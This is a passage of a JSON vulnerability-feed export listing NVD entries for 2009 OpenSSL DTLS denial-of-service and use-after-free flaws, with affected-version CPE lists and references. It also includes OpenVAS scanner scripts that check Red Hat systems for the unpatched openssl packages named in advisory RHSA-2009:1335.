"cpe:/a:openssl_project:openssl:0.9.8g-2", "cpe:/a:openssl:openssl:0.9.7:beta6", "cpe:/a:openssl:openssl:0.9.8k", "cpe:/a:openssl:openssl:0.9.3a", "cpe:/a:openssl:openssl:0.9.8j", "cpe:/a:openssl_project:openssl:0.9.8g-8", "cpe:/a:openssl:openssl:0.9.6a:beta1", "cpe:/a:openssl_project:openssl:0.9.8f-3", "cpe:/a:openssl:openssl:0.9.7:beta2", "cpe:/a:openssl_project:openssl:0.9.8e-5", "cpe:/a:openssl:openssl:0.9.8a", "cpe:/a:redhat:openssl:0.9.6b-3", "cpe:/a:openssl_project:openssl:0.9.8f-2", "cpe:/a:openssl:openssl:0.9.7c", "cpe:/a:openssl_project:openssl:0.9.8c-3", "cpe:/a:openssl:openssl:0.9.7j", "cpe:/a:openssl:openssl:0.9.7g", "cpe:/a:openssl:openssl:0.9.7:beta5", "cpe:/a:openssl:openssl:0.9.6j", "cpe:/a:openssl_project:openssl:0.9.8f-6", "cpe:/a:openssl_project:openssl:0.9.8f-5", "cpe:/a:openssl:openssl:0.9.7a", "cpe:/a:openssl:openssl:0.9.6a:beta2", "cpe:/a:openssl:openssl:0.9.3", "cpe:/a:openssl:openssl:0.9.7m", "cpe:/a:openssl:openssl:0.9.1c", "cpe:/a:openssl:openssl:0.9.7h", "cpe:/a:openssl:openssl:1.0::openvms", "cpe:/a:openssl:openssl:0.9.6k", "cpe:/a:openssl:openssl:0.9.5a", "cpe:/a:openssl_project:openssl:0.9.8g-9", "cpe:/a:openssl:openssl:0.9.6a", "cpe:/a:openssl:openssl:0.9.7d", "cpe:/a:openssl:openssl:0.9.6:beta1", "cpe:/a:openssl_project:openssl:0.9.8g-7", "cpe:/a:redhat:openssl:0.9.7a-2::i386_dev", "cpe:/a:openssl:openssl:0.9.6h", "cpe:/a:openssl:openssl:0.9.8f", "cpe:/a:openssl:openssl:0.9.8", "cpe:/a:openssl_project:openssl:0.9.8d-7", "cpe:/a:redhat:openssl:0.9.6b-3::i386", "cpe:/a:openssl:openssl:0.9.5", "cpe:/a:openssl_project:openssl:0.9.8d-5", "cpe:/a:openssl:openssl:0.9.4", "cpe:/a:openssl:openssl:0.9.8i", "cpe:/a:openssl:openssl:0.9.7:beta1", "cpe:/a:openssl_project:openssl:0.9.8e-2", "cpe:/a:openssl_project:openssl:0.9.8d-1", "cpe:/a:redhat:openssl:0.9.7a-2::i386", "cpe:/a:openssl_project:openssl:0.9.8e-3", "cpe:/a:openssl_project:openssl:0.9.8e-6", "cpe:/a:openssl:openssl:0.9.7f", "cpe:/a:openssl:openssl:0.9.8c", "cpe:/a:openssl_project:openssl:0.9.8f", "cpe:/a:openssl:openssl:0.9.7b", "cpe:/a:openssl_project:openssl:0.9.8d-4", "cpe:/a:openssl_project:openssl:0.9.8d-8", "cpe:/a:openssl_project:openssl:0.9.8f-9", "cpe:/a:openssl:openssl:0.9.6c", "cpe:/a:openssl_project:openssl:0.9.8e-1", "cpe:/a:openssl_project:openssl:0.9.8c-1", "cpe:/a:openssl:openssl:0.9.7l", "cpe:/a:openssl:openssl:0.9.6i", "cpe:/a:openssl_project:openssl:0.9.8c-2", "cpe:/a:openssl_project:openssl:0.9.8c-7", "cpe:/a:openssl_project:openssl:0.9.8c-6", "cpe:/a:openssl:openssl:0.9.7:beta4", "cpe:/a:openssl:openssl:0.9.6d", "cpe:/a:openssl:openssl:0.9.7i", "cpe:/a:openssl:openssl:0.9.8d", "cpe:/a:openssl_project:openssl:0.9.8c-4", "cpe:/a:openssl_project:openssl:0.9.8d-6", "cpe:/a:openssl:openssl:0.9.5:beta1", "cpe:/a:openssl_project:openssl:0.9.8g-3", "cpe:/a:redhat:openssl:0.9.6-15::i386", "cpe:/a:openssl_project:openssl:0.9.8d-3", "cpe:/a:openssl_project:openssl:0.9.8d-9", "cpe:/a:openssl_project:openssl:0.9.8e-7", "cpe:/a:openssl_project:openssl:0.9.8g-6", "cpe:/a:openssl_project:openssl:0.9.8f-4", "cpe:/a:openssl:openssl:0.9.7k", "cpe:/a:openssl_project:openssl:0.9.8g", "cpe:/a:openssl:openssl:0.9.6g", "cpe:/a:openssl:openssl:0.9.6:beta3", "cpe:/a:openssl:openssl:0.9.6m", "cpe:/a:openssl:openssl:0.9.7e", "cpe:/a:openssl:openssl:0.9.6a:beta3", "cpe:/a:openssl:openssl:0.9.6f", "cpe:/a:openssl:openssl:0.9.8e", "cpe:/a:openssl_project:openssl:0.9.8c-9", "cpe:/a:openssl:openssl:0.9.6:beta2", "cpe:/a:openssl:openssl:0.9.8g", "cpe:/a:openssl:openssl:0.9.6b", "cpe:/a:openssl_project:openssl:0.9.8f-8", "cpe:/a:openssl_project:openssl:0.9.8c-5", "cpe:/a:openssl:openssl:0.9.2b", "cpe:/a:openssl_project:openssl:0.9.8f-1", "cpe:/a:openssl_project:openssl:0.9.8g-1", "cpe:/a:openssl_project:openssl:0.9.8e-9", "cpe:/a:openssl_project:openssl:0.9.8e-4", "cpe:/a:redhat:openssl:0.9.7a-2::i386_perl", "cpe:/a:openssl:openssl:0.9.6l", "cpe:/a:openssl_project:openssl:0.9.8e-8", "cpe:/a:redhat:openssl:0.9.6-15"], "id": "CVE-2009-1387", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1387", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-29T14:26:35", "references": ["http://www.securitytracker.com/id?1022241", "https://kb.bluecoat.com/index?page=content&id=SA50", "http://marc.info/?l=openssl-dev&m=124263491424212&w=2", "https://launchpad.net/bugs/cve/2009-1378", "http://www.securityfocus.com/bid/35001", "http://marc.info/?l=openssl-dev&m=124247679213944&w=2", "http://www.redhat.com/support/errata/RHSA-2009-1335.html", "http://cvs.openssl.org/chngview?cn=18188", "http://lists.vmware.com/pipermail/security-announce/2010/000082.html", "http://sourceforge.net/mailarchive/message.php?msg_name=4AD43807.7080105%40users.sourceforge.net", "http://www.vupen.com/english/advisories/2010/0528", "http://www.mandriva.com/security/advisories?name=MDVSA-2009:120", "http://slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.663049", "ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2009-009.txt.asc", "http://www.vupen.com/english/advisories/2009/1377", "http://www.ubuntu.com/usn/USN-792-1", "http://lists.opensuse.org/opensuse-security-announce/2009-06/msg00003.html", "http://voodoo-circle.sourceforge.net/sa/sa-20091012-01.html", "https://www.exploit-db.com/exploits/8720", "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02029444", "http://rt.openssl.org/Ticket/Display.html?id=1931&user=guest&pass=guest", "http://security.gentoo.org/glsa/glsa-200912-01.xml", "http://www.openwall.com/lists/oss-security/2009/05/18/1"], "description": "Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka \"DTLS fragment handling memory leak.\"", "edition": 2, "reporter": "NVD", "published": "2009-05-19T15:30:00", "title": "CVE-2009-1378", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:35", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11309", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11309"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-1378"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:7229", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:7229"}], "modified": "2017-09-28T21:34:20", "cpe": ["cpe:/a:openssl_project:openssl:0.9.8d-2", "cpe:/a:openssl_project:openssl:0.9.8c-8", "cpe:/a:openssl_project:openssl:0.9.8f-7", "cpe:/a:openssl:openssl:0.9.8b", "cpe:/a:openssl:openssl:0.9.8h", "cpe:/a:openssl_project:openssl:0.9.8g-4", "cpe:/a:openssl_project:openssl:0.9.8g-5", "cpe:/a:openssl_project:openssl:0.9.8g-2", "cpe:/a:openssl:openssl:0.9.8k", "cpe:/a:openssl:openssl:0.9.8j", "cpe:/a:openssl_project:openssl:0.9.8g-8", "cpe:/a:openssl_project:openssl:0.9.8f-3", "cpe:/a:openssl_project:openssl:0.9.8e-5", "cpe:/a:openssl:openssl:0.9.8a", "cpe:/a:openssl_project:openssl:0.9.8f-2", "cpe:/a:openssl_project:openssl:0.9.8c-3", "cpe:/a:openssl_project:openssl:0.9.8f-6", "cpe:/a:openssl_project:openssl:0.9.8f-5", "cpe:/a:openssl_project:openssl:0.9.8g-9", "cpe:/a:openssl_project:openssl:0.9.8g-7", "cpe:/a:openssl:openssl:0.9.8f", "cpe:/a:openssl_project:openssl:0.9.8d-7", "cpe:/a:openssl_project:openssl:0.9.8d-5", "cpe:/a:openssl:openssl:0.9.8i", "cpe:/a:openssl_project:openssl:0.9.8e-2", "cpe:/a:openssl_project:openssl:0.9.8d-1", "cpe:/a:openssl_project:openssl:0.9.8e-3", "cpe:/a:openssl_project:openssl:0.9.8e-6", "cpe:/a:openssl:openssl:0.9.8c", "cpe:/a:openssl_project:openssl:0.9.8f", "cpe:/a:openssl_project:openssl:0.9.8d-4", "cpe:/a:openssl_project:openssl:0.9.8d-8", "cpe:/a:openssl_project:openssl:0.9.8f-9", "cpe:/a:openssl_project:openssl:0.9.8e-1", "cpe:/a:openssl_project:openssl:0.9.8c-1", "cpe:/a:openssl_project:openssl:0.9.8c-2", "cpe:/a:openssl_project:openssl:0.9.8c-7", "cpe:/a:openssl_project:openssl:0.9.8c-6", "cpe:/a:openssl:openssl:0.9.8d", "cpe:/a:openssl_project:openssl:0.9.8c-4", "cpe:/a:openssl_project:openssl:0.9.8d-6", "cpe:/a:openssl_project:openssl:0.9.8g-3", "cpe:/a:openssl_project:openssl:0.9.8d-3", "cpe:/a:openssl_project:openssl:0.9.8d-9", "cpe:/a:openssl_project:openssl:0.9.8e-7", "cpe:/a:openssl_project:openssl:0.9.8g-6", "cpe:/a:openssl_project:openssl:0.9.8f-4", "cpe:/a:openssl_project:openssl:0.9.8g", "cpe:/a:openssl:openssl:0.9.8e", "cpe:/a:openssl_project:openssl:0.9.8c-9", "cpe:/a:openssl:openssl:0.9.8g", "cpe:/a:openssl_project:openssl:0.9.8f-8", "cpe:/a:openssl_project:openssl:0.9.8c-5", "cpe:/a:openssl_project:openssl:0.9.8f-1", "cpe:/a:openssl_project:openssl:0.9.8g-1", "cpe:/a:openssl_project:openssl:0.9.8e-9", "cpe:/a:openssl_project:openssl:0.9.8e-4", "cpe:/a:openssl_project:openssl:0.9.8e-8"], "id": "CVE-2009-1378", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1378", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-29T14:26:35", "references": ["http://www.securitytracker.com/id?1022241", "https://kb.bluecoat.com/index?page=content&id=SA50", "https://launchpad.net/bugs/cve/2009-1377", "http://www.securityfocus.com/bid/35001", "http://www.redhat.com/support/errata/RHSA-2009-1335.html", "http://marc.info/?l=openssl-dev&m=124247675613888&w=2", "http://lists.vmware.com/pipermail/security-announce/2010/000082.html", "http://sourceforge.net/mailarchive/message.php?msg_name=4AD43807.7080105%40users.sourceforge.net", "http://www.vupen.com/english/advisories/2010/0528", "http://www.mandriva.com/security/advisories?name=MDVSA-2009:120", "http://slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.663049", "http://rt.openssl.org/Ticket/Display.html?id=1930&user=guest&pass=guest", "ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2009-009.txt.asc", "http://www.vupen.com/english/advisories/2009/1377", "http://www.ubuntu.com/usn/USN-792-1", "http://lists.opensuse.org/opensuse-security-announce/2009-06/msg00003.html", "http://voodoo-circle.sourceforge.net/sa/sa-20091012-01.html", "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02029444", "http://cvs.openssl.org/chngview?cn=18187", "http://security.gentoo.org/glsa/glsa-200912-01.xml", "http://www.openwall.com/lists/oss-security/2009/05/18/1"], "description": "The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of \"future epoch\" DTLS records that are buffered in a queue, aka \"DTLS record buffer limitation bug.\"", "edition": 2, "reporter": "NVD", "published": "2009-05-19T15:30:00", "title": "CVE-2009-1377", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:35", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:6683", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6683"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-1377"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9663", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9663"}], "modified": "2017-09-28T21:34:20", "cpe": ["cpe:/a:openssl_project:openssl:0.9.8d-2", "cpe:/a:openssl_project:openssl:0.9.8c-8", "cpe:/a:openssl_project:openssl:0.9.8f-7", "cpe:/a:openssl:openssl:0.9.8b", "cpe:/a:openssl:openssl:0.9.8h", "cpe:/a:openssl_project:openssl:0.9.8g-4", "cpe:/a:openssl_project:openssl:0.9.8g-5", "cpe:/a:openssl_project:openssl:0.9.8g-2", "cpe:/a:openssl:openssl:0.9.8k", "cpe:/a:openssl:openssl:0.9.8j", "cpe:/a:openssl_project:openssl:0.9.8g-8", "cpe:/a:openssl_project:openssl:0.9.8f-3", "cpe:/a:openssl_project:openssl:0.9.8e-5", "cpe:/a:openssl:openssl:0.9.8a", "cpe:/a:openssl_project:openssl:0.9.8f-2", "cpe:/a:openssl_project:openssl:0.9.8c-3", "cpe:/a:openssl_project:openssl:0.9.8f-6", "cpe:/a:openssl_project:openssl:0.9.8f-5", "cpe:/a:openssl_project:openssl:0.9.8g-9", "cpe:/a:openssl_project:openssl:0.9.8g-7", "cpe:/a:openssl:openssl:0.9.8f", "cpe:/a:openssl_project:openssl:0.9.8d-7", "cpe:/a:openssl_project:openssl:0.9.8d-5", "cpe:/a:openssl:openssl:0.9.8i", "cpe:/a:openssl_project:openssl:0.9.8e-2", "cpe:/a:openssl_project:openssl:0.9.8d-1", "cpe:/a:openssl_project:openssl:0.9.8e-3", "cpe:/a:openssl_project:openssl:0.9.8e-6", "cpe:/a:openssl:openssl:0.9.8c", "cpe:/a:openssl_project:openssl:0.9.8f", "cpe:/a:openssl_project:openssl:0.9.8d-4", "cpe:/a:openssl_project:openssl:0.9.8d-8", "cpe:/a:openssl_project:openssl:0.9.8f-9", "cpe:/a:openssl_project:openssl:0.9.8e-1", "cpe:/a:openssl_project:openssl:0.9.8c-1", "cpe:/a:openssl_project:openssl:0.9.8c-2", "cpe:/a:openssl_project:openssl:0.9.8c-7", "cpe:/a:openssl_project:openssl:0.9.8c-6", "cpe:/a:openssl:openssl:0.9.8d", "cpe:/a:openssl_project:openssl:0.9.8c-4", "cpe:/a:openssl_project:openssl:0.9.8d-6", "cpe:/a:openssl_project:openssl:0.9.8g-3", "cpe:/a:openssl_project:openssl:0.9.8d-3", "cpe:/a:openssl_project:openssl:0.9.8d-9", "cpe:/a:openssl_project:openssl:0.9.8e-7", "cpe:/a:openssl_project:openssl:0.9.8g-6", "cpe:/a:openssl_project:openssl:0.9.8f-4", "cpe:/a:openssl_project:openssl:0.9.8g", "cpe:/a:openssl:openssl:0.9.8e", "cpe:/a:openssl_project:openssl:0.9.8c-9", "cpe:/a:openssl:openssl:0.9.8g", "cpe:/a:openssl_project:openssl:0.9.8f-8", "cpe:/a:openssl_project:openssl:0.9.8c-5", "cpe:/a:openssl_project:openssl:0.9.8f-1", "cpe:/a:openssl_project:openssl:0.9.8g-1", "cpe:/a:openssl_project:openssl:0.9.8e-9", "cpe:/a:openssl_project:openssl:0.9.8e-4", "cpe:/a:openssl_project:openssl:0.9.8e-8"], "id": "CVE-2009-1377", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1377", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-29T14:26:35", "references": ["http://www.securitytracker.com/id?1022241", "https://kb.bluecoat.com/index?page=content&id=SA50", "http://www.openwall.com/lists/oss-security/2009/05/18/4", "https://launchpad.net/bugs/cve/2009-1379", "http://www.redhat.com/support/errata/RHSA-2009-1335.html", "http://lists.vmware.com/pipermail/security-announce/2010/000082.html", "http://sourceforge.net/mailarchive/message.php?msg_name=4AD43807.7080105%40users.sourceforge.net", "http://rt.openssl.org/Ticket/Display.html?id=1923&user=guest&pass=guest", "http://www.vupen.com/english/advisories/2010/0528", "http://slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.663049", "ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2009-009.txt.asc", "http://www.vupen.com/english/advisories/2009/1377", "http://www.ubuntu.com/usn/USN-792-1", "http://lists.opensuse.org/opensuse-security-announce/2009-06/msg00003.html", "http://voodoo-circle.sourceforge.net/sa/sa-20091012-01.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/50661", "http://www.securityfocus.com/bid/35138", "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02029444", "http://security.gentoo.org/glsa/glsa-200912-01.xml"], "description": "Use-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate.", "edition": 3, "reporter": "NVD", "published": "2009-05-19T15:30:00", "title": "CVE-2009-1379", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:35", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:6848", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6848"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-1379"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:6848", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:6848"}], "modified": "2017-09-28T21:34:20", "cpe": ["cpe:/a:openssl:openssl:1.0.0:beta2"], "id": "CVE-2009-1379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1379", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-27T10:55:56", "references": ["http://www.redhat.com/security/updates/classification/#moderate", "http://rhn.redhat.com/errata/RHSA-2009-1335.html"], "pluginID": "64799", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1335.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a full-strength\ngeneral purpose cryptography library. Datagram TLS (DTLS) is a protocol\nbased on TLS that is capable of securing datagram transport (for example,\nUDP).\n\nMultiple denial of service flaws were discovered in OpenSSL's DTLS\nimplementation. A remote attacker could use these flaws to cause a DTLS\nserver to use excessive amounts of memory, or crash on an invalid memory\naccess or NULL pointer dereference. (CVE-2009-1377, CVE-2009-1378,\nCVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\nNote: These flaws only affect applications that use DTLS. Red Hat does not\nship any DTLS client or server applications in Red Hat Enterprise Linux.\n\nAn input validation flaw was found in the handling of the BMPString and\nUniversalString ASN1 string types in OpenSSL's ASN1_STRING_print_ex()\nfunction. An attacker could use this flaw to create a specially-crafted\nX.509 certificate that could cause applications using the affected function\nto crash when printing certificate contents. (CVE-2009-0590)\n\nNote: The affected function is rarely used. No application shipped with Red\nHat Enterprise Linux calls this function, for example.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "RedHat Security Advisory RHSA-2009:1335", "type": "openvas", "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-0590"], "modified": "2017-07-12T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64799", "id": "OPENVAS:64799", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1335.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1335 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"OpenSSL users should upgrade to these updated packages, which resolve these\nissues and add these enhancements.\n\nPlease note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1335.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a full-strength\ngeneral purpose cryptography library. Datagram TLS (DTLS) is a protocol\nbased on TLS that is capable of securing datagram transport (for example,\nUDP).\n\nMultiple denial of service flaws were discovered in OpenSSL's DTLS\nimplementation. A remote attacker could use these flaws to cause a DTLS\nserver to use excessive amounts of memory, or crash on an invalid memory\naccess or NULL pointer dereference. (CVE-2009-1377, CVE-2009-1378,\nCVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\nNote: These flaws only affect applications that use DTLS. Red Hat does not\nship any DTLS client or server applications in Red Hat Enterprise Linux.\n\nAn input validation flaw was found in the handling of the BMPString and\nUniversalString ASN1 string types in OpenSSL's ASN1_STRING_print_ex()\nfunction. An attacker could use this flaw to create a specially-crafted\nX.509 certificate that could cause applications using the affected function\nto crash when printing certificate contents. (CVE-2009-0590)\n\nNote: The affected function is rarely used. No application shipped with Red\nHat Enterprise Linux calls this function, for example.\";\n\n\n\n\nif(description)\n{\n script_id(64799);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-09 02:15:49 +0200 (Wed, 09 Sep 2009)\");\n script_cve_id(\"CVE-2009-0590\", \"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1386\", \"CVE-2009-1387\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"RedHat Security Advisory RHSA-2009:1335\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1335.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~12.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~0.9.8e~12.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~0.9.8e~12.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8e~12.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:06", "references": ["http://www.redhat.com/security/updates/classification/#moderate", "http://rhn.redhat.com/errata/RHSA-2009-1335.html"], "pluginID": "136141256231064799", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1335.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a full-strength\ngeneral purpose cryptography library. Datagram TLS (DTLS) is a protocol\nbased on TLS that is capable of securing datagram transport (for example,\nUDP).\n\nMultiple denial of service flaws were discovered in OpenSSL's DTLS\nimplementation. A remote attacker could use these flaws to cause a DTLS\nserver to use excessive amounts of memory, or crash on an invalid memory\naccess or NULL pointer dereference. (CVE-2009-1377, CVE-2009-1378,\nCVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\nNote: These flaws only affect applications that use DTLS. Red Hat does not\nship any DTLS client or server applications in Red Hat Enterprise Linux.\n\nAn input validation flaw was found in the handling of the BMPString and\nUniversalString ASN1 string types in OpenSSL's ASN1_STRING_print_ex()\nfunction. An attacker could use this flaw to create a specially-crafted\nX.509 certificate that could cause applications using the affected function\nto crash when printing certificate contents. (CVE-2009-0590)\n\nNote: The affected function is rarely used. No application shipped with Red\nHat Enterprise Linux calls this function, for example.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-09T00:00:00", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1335", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-0590"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064799", "id": "OPENVAS:136141256231064799", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1335.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1335 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"OpenSSL users should upgrade to these updated packages, which resolve these\nissues and add these enhancements.\n\nPlease note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1335.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a full-strength\ngeneral purpose cryptography library. Datagram TLS (DTLS) is a protocol\nbased on TLS that is capable of securing datagram transport (for example,\nUDP).\n\nMultiple denial of service flaws were discovered in OpenSSL's DTLS\nimplementation. A remote attacker could use these flaws to cause a DTLS\nserver to use excessive amounts of memory, or crash on an invalid memory\naccess or NULL pointer dereference. (CVE-2009-1377, CVE-2009-1378,\nCVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\nNote: These flaws only affect applications that use 